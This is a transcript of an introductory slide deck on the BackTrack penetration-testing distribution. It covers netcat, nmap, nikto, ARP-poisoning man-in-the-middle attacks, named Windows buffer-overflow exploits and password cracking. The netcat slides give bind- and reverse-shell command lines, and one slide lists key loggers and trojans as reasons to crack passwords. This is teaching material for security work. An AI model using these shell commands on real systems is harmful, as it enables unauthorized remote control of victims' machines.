Transcript Slide 1
<<
back | track 3
Introduction to BackTrack
Local boot to remote root in just one CD
Thought for the day, “Don’t learn to hack, hack to learn”..!!!
- darknet.org.uk
Kunal Sehgal
[email protected]
<<
back | track 3
Introduction:
•
BackTrack is a suite of penetration testing/vulnerability assessment tools
installed on a Linux Operating System, all wrapped-up on a bootable (live)
CD
•
The most top rated Linux live distribution focused on penetration testing
•
Consists of more than 300 different up-to-date tools which are logically
structured according to the work flow of security professionals
•
Rated #1 Security-Distro by insecure.org & sectools.org
<<
Miscellaneous BT Services:
•
HTTP (Port: 80)
•
TFTP (Port: 69)
•
SSH (Port: 22)
•
VNC (Port: 5901)
back | track 3
<<
back | track 3
Netcat:
•
A computer networking utility for reading from and writing to network
connections on either TCP or UDP
•
Feature-rich network debugging and exploration tool, since it can create
almost any kind of connection you would need, including port binding to
accept incoming connections
•
Bind Shell
•
Reverse Shell
<<
back | track 3
Bind Shell:
Internet
Internet
NAT
Attacker
(Private IP)
nc -v <IP> 4444
Victim
Attacker Connects to Victim
(Incoming Traffic)
(Public IP)
nc -lvp 4444 -e cmd.exe
<<
back | track 3
Reverse Shell:
Internet
Internet
NAT
Attacker
(Public IP)
nc -lvp 4444
Victim
Victim sends the shell
(Outgoing Traffic)
(Private IP)
nc -v <IP> 4444 -e cmd.exe
<<
back | track 3
Nmap:
•
A security scanner used to discover computers and services on a computer
network, thus creating a "map" of the network
•
Capable of discovering passive services on a network despite the fact that
such services aren't advertising themselves
•
May be able to determine various details about the remote computers.
These include operating system, device type, uptime, software product used
to run a service, exact version number of that product, etc.
<<
back | track 3
Nikto:
•
A scanner which performs comprehensive tests against web servers for
multiple items
•
Includes over 3500 potentially dangerous files/CGIs, versions on over 900
servers, and version specific problems on over 250 servers
•
Not every check is a security problem, though most are
•
There are some items that are "info only" type checks that look for items
that may not have a security flaw, but the webmaster or security engineer
may not know are present on the server
<<
back | track 3
ARP Poisoning – Man In The Middle Attack:
•
MAC Address: Hardware address or physical address is a quasi-unique
identifier assigned to most network adapters or network interface cards
(NICs) by the manufacturer for identification
•
Address Resolution Protocol (ARP): A method for finding a host's hardware
address when only its Network Layer address is known
•
Ettercap: A suite for man in the middle attacks on LAN. It features sniffing of
live connections, content filtering on the fly and many other interesting tricks
<<
back | track 3
Network Using A Hub
Receiver
Sender
Attacker
Can easily sniff
data
<<
back | track 3
Network Using A Switch
Receiver
Sender
Attacker
Cannot sniff any
data :(
<<
back | track 3
Man In The Middle Attack
Receiver
Sender
Attacker
Hi everyone, I’m
the switch
<<
back | track 3
Exploits:
•
An exploit is a piece of software, a chunk of data, or sequence of
commands that take advantage of a bug, glitch or vulnerability in order to
cause unintended or unanticipated behavior to occur
•
Frequently includes such things as violently gaining control of a computer
system or allowing privilege escalation or a denial of service attack
•
Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or
patchfree computer application vulnerabilities
•
www.securityfocus.com & www.milw0rm.com
•
<<
back | track 3
Exploits (Conti…):
Attack / Exploit
Vulnerability
Payload
• App
• Add a user
• Protocol
• Get a remote shell
• O/S
• GUI access
• Change routing tables
• Etc.. Etc..
<<
back | track 3
Exploit Frameworks:
•
A development platform for creating security tools and exploits
•
Used by network security professionals to perform penetration tests, system
administrators to verify patch installations, product vendors to perform
regression testing, and security researchers world-wide
•
A boon for script kiddies
<<
back | track 3
Windows DCOM RPC Interface Buffer Overrun:
•
Exploits a vulnerability in Windows OS
•
The issue is due to insufficient bounds checking of client DCOM object
activation requests. Exploitation of this issue could result in execution of
malicious instructions with Local System privileges on an affected system
•
www.securityfocus.com/bid/8205
•
Bind Shell
<<
back | track 3
IE IsComponentInstalled Buffer Overflow Vulnerability:
•
Exploits a vulnerability in an application (MS Internet Explorer)
•
Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability
in the 'IsComponentInstalled()' method. A successful exploit results in
arbitrary code execution in the context of the user running the browser
•
www.securityfocus.com/bid/16870
•
Reverse Shell
<<
back | track 3
MS Windows Graphics Rendering Engine WMF:
•
Exploits a vulnerability in MS Windows WMF graphics rendering engine
•
The problem presents itself when a user views a malicious WMF formatted
file, triggering the vulnerability when the engine attempts to parse the file
•
www.securityfocus.com/bid/16074
<<
Passwords Hacking:
Why hack local passwords?
• Install softwares – key loggers, trojans, etc
• Gain access to another PC, Server, Router, etc.
• People re-use passwords all the time
Types of attack:
• Brute force Attack
• Dictionary Attack
• Rainbow Tables
back | track 3
<<
back | track 3
Password Attack Vectors:
•
Online Attack: Attacking network services that require a user to log on, by
guessing the correct password
•
Offline Attack: Attacking hash files that store encrypted passwords
•
Physical Access Attack: Attacking machines and other network devices,
after gaining physical access
<<
back | track 3
How To Hack Windows Passwords?
•
Available Tools: John The Ripper, Cain & Abel, Rainbow Tables
•
Gain access to the victim’s PC
<<
back | track 3
Google Hacking:
•
Google hacking is a term that refers to the act of creating complex search
engine queries in order to filter through large amounts of search results
•
In its malicious format it can be used to detect websites that are vulnerable
to numerous exploits and vulnerabilities as well as locate private, sensitive
information about others
•
http://johnny.ihackstuff.com
<<
References:
•
•
•
•
•
•
•
•
•
•
•
www.remote-exploit.org
www.offensive-security.com
www.wikipedia.org
www.metasploit.com
www.irongeek.com
www.cirt.net/nikto2
www.sourceforge.net
www.securityfocus.com
www.darknet.org.uk
johnny.ihackstuff.com
www.oxid.it/cain.html
back | track 3
<<
Questions??
Feel free to contact me:
Kunal Sehgal
back | track 3
<<
Workshop Exercise:
back | track 3